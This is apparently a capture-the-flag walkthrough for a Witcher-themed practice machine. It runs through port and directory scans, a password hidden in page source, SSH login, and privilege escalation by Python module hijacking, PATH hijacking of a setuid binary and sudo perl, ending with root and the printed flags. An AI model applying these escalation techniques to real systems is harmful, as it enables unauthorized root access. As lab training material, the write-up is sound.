Toss a coin

IP Address
10.10.6.2

$> nmap -vv 10.10.6.2 -p-
Starting Nmap 7.60 ( https://nmap.org ) at 2024-05-21 10:36 BST
Initiating ARP Ping Scan at 10:36
Scanning 10.10.6.2 [1 port]
Completed ARP Ping Scan at 10:36, 0.23s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 10:36
Completed Parallel DNS resolution of 1 host. at 10:36, 0.00s elapsed
Initiating SYN Stealth Scan at 10:36
Scanning ip-10-10-6-2.eu-west-1.compute.internal (10.10.6.2) [65535 ports]
Discovered open port 80/tcp on 10.10.6.2
Discovered open port 22/tcp on 10.10.6.2

port 80 : web
port 22 : SSH

$> gobuster dir -u 10.10.6.2 -w Tools/wordlists/SecLists/Discovery/Web-Content/common.txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.6.2
[+] Threads:        10
[+] Wordlist:       Tools/wordlists/SecLists/Discovery/Web-Content/common.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2024/05/21 10:37:15 Starting gobuster
===============================================================
/img (Status: 301)
/index.html (Status: 301)
/t (Status: 301)
===============================================================
2024/05/21 10:37:16 Finished
===============================================================

http://10.10.6.2/
Toss a coin to your witcher
Don't fight it, you know you want to sing it, it might even help you out.

http://10.10.6.2/img/
jaskier.jpg
jaskier2.jpg

http://10.10.6.2/t/
"Do you know the lyrics? this one is pretty famous!"

$>gobuster dir -u 10.10.245.158/t -w Tools/wordlists/SecLists/Discovery/Web-Content/common.txt 
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.245.158/t
[+] Threads:        10
[+] Wordlist:       Tools/wordlists/SecLists/Discovery/Web-Content/common.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2024/05/21 13:27:04 Starting gobuster
===============================================================
/index.html (Status: 301)
/o (Status: 301)
===============================================================
2024/05/21 13:27:05 Finished
===============================================================

$>gobuster dir -u 10.10.245.158/t/o/... -w Tools/wordlists/SecLists/Discovery/Web-Content/common.txt 

$> gobuster dir -u 10.10.245.158/t/o/s/s/_/a/_/c/o/i/n/_/t/o/_/y/o/u/r/_/w/i/t/c/h/e/r/_/o/h/_/v/a/l/l/e/y/_/o/f/_/p/l/e/n/t/y -w Tools/wordlists/SecLists/Discovery/Web-Content/common.txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.245.158/t/o/s/s/_/a/_/c/o/i/n/_/t/o/_/y/o/u/r/_/w/i/t/c/h/e/r/_/o/h/_/v/a/l/l/e/y/_/o/f/_/p/l/e/n/t/y
[+] Threads:        10
[+] Wordlist:       Tools/wordlists/SecLists/Discovery/Web-Content/common.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2024/05/21 13:15:28 Starting gobuster
===============================================================
/index.html (Status: 301)
===============================================================
2024/05/21 13:15:28 Finished
===============================================================

view-source:http://10.10.245.158/t/o/s/s/_/a/_/c/o/i/n/_/t/o/_/y/o/u/r/_/w/i/t/c/h/e/r/_/o/h/_/v/a/l/l/e/y/_/o/f/_/p/l/e/n/t/y/

<!DOCTYPE html>
<head>
    <title>Toss a coin to your witcher</title>
    <link rel="stylesheet" type="text/css" href="/main.css">
</head>
<body>
    <p>"So you DO know the lyrics. Well, good for you!"</p>
    <img src="/img/jaskier2.jpg" style="height: 40rem;">
    <p style="display: none;">jaskier:YouHaveTheMostIncredibleNeckItsLikeASexyGoose</p>
</body>

ssh jaskier@10.10.6.2
The authenticity of host '10.10.6.2 (10.10.6.2)' can't be established.
ECDSA key fingerprint is SHA256:HUoT05UWCcf3WRhR5kF7yKX1yqUvNhjqtxuUMyOeqR8.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '10.10.6.2' (ECDSA) to the list of known hosts.
jaskier@10.10.6.2's password: 
YouHaveTheMostIncredibleNeckItsLikeASexyGoose

jaskier@the-continent:~$ ls
toss-a-coin.py  user.txt
jaskier@the-continent:~$ cat user.txt 
EPI{R3Sp3C7_D03sNT_M4k3_h1S70rY}

jaskier@the-continent:~$ cat toss-a-coin.py 
import random
song = """When a humble bard
Graced a ride along
With Geralt of Rivia
Along came this song

From when the White Wolf fought
A silver-tongued devil
His army of elves
At his hooves did they revel

They came after me
With masterful deceit
Broke down my lute
And they kicked in my teeth

While the devil's horns
Minced our tender meat
And so cried the Witcher
He can't be bleat

Toss a coin to your Witcher
Oh, Valley of Plenty
Oh, Valley of Plenty, oh
Toss a coin to your Witcher
Oh, Valley of Plenty

At the edge of the world
Fight the mighty horde
That bashes and breaks you
And brings you to mourn

He thrust every elf
Far back on the shelf
High up on the mountain
From whence it came

He wiped out your pest
Got kicked in his chest
He's a friend of humanity
So give him the rest

That's my epic tale
Our champion prevailed
Defeated the villain
Now pour him some ale

Toss a coin to your Witcher
Oh, Valley of Plenty
Oh, Valley of Plenty, oh
Toss a coin to your Witcher
A friend of humanity

Toss a coin to your Witcher
Oh, Valley of Plenty
Oh, Valley of Plenty, oh
Toss a coin to your Witcher
A friend of humanity

Toss a coin to your Witcher
Oh, Valley of Plenty
Oh, Valley of Plenty, ah-ah, oh
Toss a coin to your Witcher
A friend of humanity"""

for i in range(10):
    line = random.choice(song.split("\n"))
    print("The line was:\t", line)

sudo -l
Matching Defaults entries for jaskier on the-continent:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User jaskier may run the following commands on the-continent:
    (yen) /usr/bin/python3.6 /home/jaskier/toss-a-coin.py

abuse du import random
python va d'abbord rechercher dans le dossier courant du fichier qu'il execute voir si il y a un xxxx.py correspondant a ce qu'il veut improt
puis apres il va dans les path du files system
donc, si tu creer un fichier random.py dans le meme dossier que ton fichier qui import random, il va l'executer

>$ touch random.py
>$ nano random.py
import os
os.system('/bin/bash')
os.system('env_reset, mail_badpass,')
os.system('secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin')

$> sudo -u yen /usr/bin/python3.6 /home/jaskier/toss-a-coin.py

$> cd /home/yen/
$> ls
portal

$> ./portal 
I am preparing a portal for you Geralt.
It will be ready in about Tue, 21 May 2024 18:02:36 +0000
You just have to wait for it

strace "./portal"
execve("./portal", ["./portal"], 0x7ffd9e6e0b20 /* 20 vars */) = 0
access("/etc/suid-debug", F_OK)         = -1 ENOENT (No such file or directory)
brk(NULL)                               = 0x55f491173000
fcntl(0, F_GETFD)                       = 0
fcntl(1, F_GETFD)                       = 0
fcntl(2, F_GETFD)                       = 0
access("/etc/suid-debug", F_OK)         = -1 ENOENT (No such file or directory)
access("/etc/ld.so.nohwcap", F_OK)      = -1 ENOENT (No such file or directory)
access("/etc/ld.so.preload", R_OK)      = -1 ENOENT (No such file or directory)
openat(AT_FDCWD, "/etc/ld.so.cache", O_RDONLY|O_CLOEXEC) = 3
fstat(3, {st_mode=S_IFREG|0644, st_size=22868, ...}) = 0
mmap(NULL, 22868, PROT_READ, MAP_PRIVATE, 3, 0) = 0x7fefcf0ab000
close(3)                                = 0
access("/etc/ld.so.nohwcap", F_OK)      = -1 ENOENT (No such file or directory)
openat(AT_FDCWD, "/lib/x86_64-linux-gnu/libc.so.6", O_RDONLY|O_CLOEXEC) = 3
read(3, "\177ELF\2\1\1\3\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0\240\35\2\0\0\0\0\0"..., 832) = 832
fstat(3, {st_mode=S_IFREG|0755, st_size=2030928, ...}) = 0
mmap(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fefcf0a9000
mmap(NULL, 4131552, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x7fefcea97000
mprotect(0x7fefcec7e000, 2097152, PROT_NONE) = 0
mmap(0x7fefcee7e000, 24576, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x1e7000) = 0x7fefcee7e000
mmap(0x7fefcee84000, 15072, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x7fefcee84000
close(3)                                = 0
arch_prctl(ARCH_SET_FS, 0x7fefcf0aa4c0) = 0
mprotect(0x7fefcee7e000, 16384, PROT_READ) = 0
mprotect(0x55f490f6d000, 4096, PROT_READ) = 0
mprotect(0x7fefcf0b1000, 4096, PROT_READ) = 0
munmap(0x7fefcf0ab000, 22868)           = 0
setuid(1003)                            = -1 EPERM (Operation not permitted)
setgid(1003)                            = -1 EPERM (Operation not permitted)
fstat(1, {st_mode=S_IFCHR|0620, st_rdev=makedev(136, 0), ...}) = 0
brk(NULL)                               = 0x55f491173000
brk(0x55f491194000)                     = 0x55f491194000
write(1, "I am preparing a portal for you "..., 40I am preparing a portal for you Geralt.
) = 40
rt_sigaction(SIGINT, {sa_handler=SIG_IGN, sa_mask=[], sa_flags=SA_RESTORER, sa_restorer=0x7fefcead5f10}, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=0}, 8) = 0
rt_sigaction(SIGQUIT, {sa_handler=SIG_IGN, sa_mask=[], sa_flags=SA_RESTORER, sa_restorer=0x7fefcead5f10}, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=0}, 8) = 0
rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0
clone(child_stack=NULL, flags=CLONE_PARENT_SETTID|SIGCHLD, parent_tidptr=0x7ffed62bdbec) = 1297
wait4(1297, It will be ready in about Wed, 22 May 2024 15:08:00 +0000
[{WIFEXITED(s) && WEXITSTATUS(s) == 0}], 0, NULL) = 1297
rt_sigaction(SIGINT, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=SA_RESTORER, sa_restorer=0x7fefcead5f10}, NULL, 8) = 0
rt_sigaction(SIGQUIT, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=SA_RESTORER, sa_restorer=0x7fefcead5f10}, NULL, 8) = 0
rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0
--- SIGCHLD {si_signo=SIGCHLD, si_code=CLD_EXITED, si_pid=1297, si_uid=1002, si_status=0, si_utime=0, si_stime=0} ---
write(1, "You just have to wait for it\n", 29You just have to wait for it
) = 29
fstat(0, {st_mode=S_IFCHR|0620, st_rdev=makedev(136, 0), ...}) = 0
read(0, 0x55f491173670, 1024)           = ? ERESTARTSYS (To be restarted if SA_RESTART is set)
--- SIGWINCH {si_signo=SIGWINCH, si_code=SI_KERNEL} ---
read(0, 


setuid(1003)

cat passwd | grep '1003'
geralt:x:1003:1003:Mad Hatter,,,:/home/geralt:/bin/bash
nano date
cat date 
#!/bin/bash
/bin/bash
chmod 777 date
export PATH=/home/yen:$PATH

./portal 
I am preparing a portal for you Geralt.
It will be ready in about geralt@the-continent:/home/yen$ ls
date  portal
geralt@the-continent:/home/yen$ cd /home/geralt/
geralt@the-continent:/home/geralt$ ls
password.txt
geralt@the-continent:/home/geralt$ cat password.txt 
IH4teP0rt4ls

sudo -l
[sudo] password for geralt: 
Matching Defaults entries for geralt on the-continent:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User geralt may run the following commands on the-continent:
    (root) /usr/bin/perl

cat file 
#!/usr/bin/perl
system("/bin/bash");
geralt@the-continent:/home/geralt$ sudo /usr/bin/perl file 
root@the-continent:/home/geralt# cd /root/
root@the-continent:/root# ls
root.txt
root@the-continent:/root# cat root.txt
EPI{D3s71Ny_1s_Ju5t_Th3_3mB0D1m3Nt_0f_Th3_S0uL_S_D3s1R3_T0_Gr0W}
